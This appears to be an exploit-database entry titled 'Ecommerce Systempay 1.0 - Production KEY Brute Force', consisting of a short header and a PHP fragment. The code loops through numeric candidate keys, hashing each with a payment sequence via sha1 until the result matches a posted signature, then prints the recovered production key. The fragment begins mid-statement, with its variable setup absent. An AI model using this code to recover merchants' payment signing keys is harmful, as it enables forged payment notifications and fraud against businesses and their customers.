# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force # Author: live3 # Date: 2020-02-05 # Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ # Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ # Tested on: MacOs # Version: ALL '; $found = false; $get_key = ''; // first check if (sha1($sentence.$last_key_check) != $signature_from_post) { for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) { $get_key = $i; if (sha1($sentence.$i) == $signature_from_post) { echo 'Key found : '.$i.'
'; $found = true; break; } } } else { $found = true; } if ($found) { $test_sha = sha1($sentence.$get_key); echo 'Signature calc : '.$test_sha.'

'; } else { echo 'Last key check : '.$get_key.'

'; } echo 'Your sequence : '.$sentence.'
';